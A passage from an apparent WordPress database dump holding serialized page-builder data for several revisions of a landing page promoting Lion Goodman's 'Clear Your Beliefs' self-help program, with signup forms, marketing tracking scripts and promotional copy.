src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:569:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearyourbeliefs.com/program" target=_"blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1633, 2060, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1672:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:569:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://clearyourbeliefs.com/program" target="_blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion Goodman</center></i>";s:4:"info";a:4:{s:4:"grid";s:1:"6";s:4:"cell";s:1:"0";s:2:"id";s:1:"8";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}}s:5:"grids";a:7:{i:0;a:1:{s:5:"cells";s:1:"1";}i:1;a:1:{s:5:"cells";s:1:"1";}i:2;a:1:{s:5:"cells";s:1:"3";}i:3;a:1:{s:5:"cells";s:1:"1";}i:4;a:1:{s:5:"cells";s:1:"1";}i:5;a:1:{s:5:"cells";s:1:"1";}i:6;a:1:{s:5:"cells";s:1:"1";}}s:10:"grid_cells";a:9:{i:0;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"0";}i:1;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"1";}i:2;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:3;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:4;a:2:{s:6:"weight";s:18:"0.3333333333333333";s:4:"grid";s:1:"2";}i:5;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"3";}i:6;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"4";}i:7;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"5";}i:8;a:2:{s:6:"weight";s:1:"1";s:4:"grid";s:1:"6";}}}'),
(1647, 2078, 'panels_data', 'a:3:{s:7:"widgets";a:9:{i:0;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:115:"<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />";s:4:"info";a:4:{s:4:"grid";s:1:"0";s:4:"cell";s:1:"0";s:2:"id";s:1:"0";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:1;a:4:{s:5:"title";s:0:"";s:4:"text";s:164:"<center>\n<div class=''embed-container''>\n     <iframe src=''//player.vimeo.com/video/109282065?autoplay=1'' frameborder=''0'' allowfullscreen></iframe>\n</div>\n</center>\n\n";s:6:"filter";s:0:"";s:4:"info";a:4:{s:4:"grid";s:1:"1";s:4:"cell";s:1:"0";s:2:"id";s:1:"1";s:5:"class";s:14:"WP_Widget_Text";}}i:2;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1461:"[su_box title="Free eBook" box_color="#1a2d8c" radius="8"]\n\n<center style="margin-bottom: -30px; margin-top: 15px;"><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /></center>\n<p class="tri-panel-p tri-panel-1st-p" style="text-align: center; padding-top: 30px !important; margin: 0px;"><strong>Get the free eBook.</strong></p>\n\n<form class="infusion-form" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/54657fac17ff5d88bb7ea5db95ab4742" method="POST" name="inf_form_xid"><input name="inf_form_name" type="hidden" value="Sign up for free �Clear Your Beliefs�eBook" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="infusion-field"><label class="form-label" for="inf_field_FirstName">FIRST NAME *</label>\n<input required id="inf_field_FirstName" class="form-input" name="inf_field_FirstName" type="text" /></div>\n<div class="infusion-field"><label class="form-label" for="inf_field_Email">EMAIL *</label>\n<input required id="inf_field_Email" class="form-input" name="inf_field_Email" type="text" /></div>\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="GET ACCESS NOW" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"0";s:2:"id";s:1:"2";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:3;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1672:"[su_box title="Free App" box_color="#1a2d8c" radius="8"]\n<center style="margin-bottom: -27px; margin-top: -7px;"><img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iclearit-App-logo_FINAL-246x300.jpg" alt="download" width="89" height="87" /></center>\n<p class="tri-panel-p tri-panel-2nd-p-1" style="text-align: center; margin-top: 32px;"><strong>Download the Free App</strong>\nfor iPhone &#038; iPad</p>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\n<form style="position: relative; top: 10px ! important;" class="infusion-form nd-form-1" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/95b50364c9028abe58d1cf438ba1ed6c" method="POST"><input name="inf_form_xid" type="hidden" value="95b50364c9028abe58d1cf438ba1ed6c" /><input name="inf_form_name" type="hidden" value="Click �Download iphone APP" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button" style=""><input class="form-input-button" type="submit" value="Download the App" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n\n<script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>\n<p class="tri-panel-p tri-panel-2nd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -4px; padding:0 5px;">FREE (for a limited time)</p>\n[/su_box]";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"1";s:2:"id";s:1:"3";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:4;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1438:"[su_box title="Complete Program" box_color="#1a2d8c" radius="8"]\n<div style="height: auto; width: 100%;"><img style="margin-top: 0px !important; width: 100% !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/11/cyb-3rd-head.jpg" alt="" />\n\n<p class="tri-panel-p tri-panel-3rd-p" style="text-align: center; margin-top: 10px; font-size: 16px;"><big><strong>Clear Your Limiting\nand Negative Beliefs</strong></big> <big><strong>\n- Permanently!</strong></big>\n\n<p class="tri-panel-p tri-panel-3rd-p-2" style="text-align: center; font-size: 14px; margin-bottom: -2px; padding:0 5px;">A 7-week journey into your\nsubconscious mind to delete the beliefs that hold you back.\n\n<form target="_blank" class="infusion-form rd-form-1 rd-form-1-3rd" style="position: relative;" accept-charset="UTF-8" action="https://beliefcloset.infusionsoft.com/app/form/process/af866427c80f3c42fbfe2df24442de38" method="POST"><input name="inf_form_xid" type="hidden" value="af866427c80f3c42fbfe2df24442de38" /><input name="inf_form_name" type="hidden" value="Click IClearit�&quot;Learn More&quot;" /><input name="infusionsoft_version" type="hidden" value="1.35.0.43" />\n<div class="form-input-container-button"><input class="form-input-button" type="submit" value="LEARN MORE" /></div>\n</form><script src="https://beliefcloset.infusionsoft.com/app/webTracking/getTrackingCode?trackingId=16dc93a7538290df11c92f0bcfcede01"></script>[/su_box]\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"2";s:4:"cell";s:1:"2";s:2:"id";s:1:"4";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:5;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:1417:"<div id="divStroke" style="padding-top: 25px; padding-bottom: 25px;">\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n[su_row][su_column size="1/2"]\n<ul style="margin-left: 25px;">\n	<li>Release pain and hurts from the past</li>\n	<li>Open to deeper, more profound love</li>\n	<li>Recognize your true spiritual nature</li>\n	<li>Become more calm and less reactive</li>\n	<li>Rediscover the source of your personal power</li>\n</ul>\n[/su_column][su_column size="1/2"]\n<ul>\n	<li>Clear whatever stops you from taking action</li>\n	<li>Open yourself to new possibilities of success</li>\n	<li>Eliminate blocks and barriers easily</li>\n	<li>Discover your true purpose</li>\n	<li>Express your true magnificence</li>\n</ul>\n[/su_column][/su_row]\n<h2>How and Why It Works So Well</h2>\n<ul style="margin-left: 26px;">\n	<li>Beliefs are the major cause of unhappiness, upsets, and limitations.</li>\n	<li>The <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.</li>\n	<li>The process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.</li>\n	<li>You''re in charge – you decide what you want to believe, and how far you want to go.</li>\n	<li>The program guides you, gently, step-by-step, through the entire process of deleting beliefs.</li>\n	<li>Unlike other methods, the changes you make are permanent – your old beliefs don''t come back.</li>\n</ul>\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"3";s:4:"cell";s:1:"0";s:2:"id";s:1:"5";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:6;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:2893:"<div id="divStroke">\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n<ul style="margin-left: 25px;">\n	<li><em style="margin-left: -6px;">What do I want to experience?</em></li>\n	<li><em style="margin-left: -6px;">What belief is creating this experience I don''t want?</em></li>\n	<li><em style="margin-left: -6px;">How can I change my belief so I can change my experience?</em></li>\n</ul>\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt.</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"4";s:4:"cell";s:1:"0";s:2:"id";s:1:"6";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:7;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:561:"<div id="divStroke2">\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3>\n<p style="text-align: center; margin: 0px 5%;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p>\n<p style="text-align: center;">[su_button url="http://www.clearbeliefs.com" target="_blank" background="#253aa4" size="9"]Learn About the Practitioner Training[/su_button]</p>\n\n\n<hr id="lines"/>\n\n</div>";s:4:"info";a:4:{s:4:"grid";s:1:"5";s:4:"cell";s:1:"0";s:2:"id";s:1:"7";s:5:"class";s:30:"WP_Widget_Black_Studio_TinyMCE";}}i:8;a:4:{s:4:"type";s:4:"html";s:5:"title";s:0:"";s:4:"text";s:57:"<center><i>© Copyright 2014 by Lion 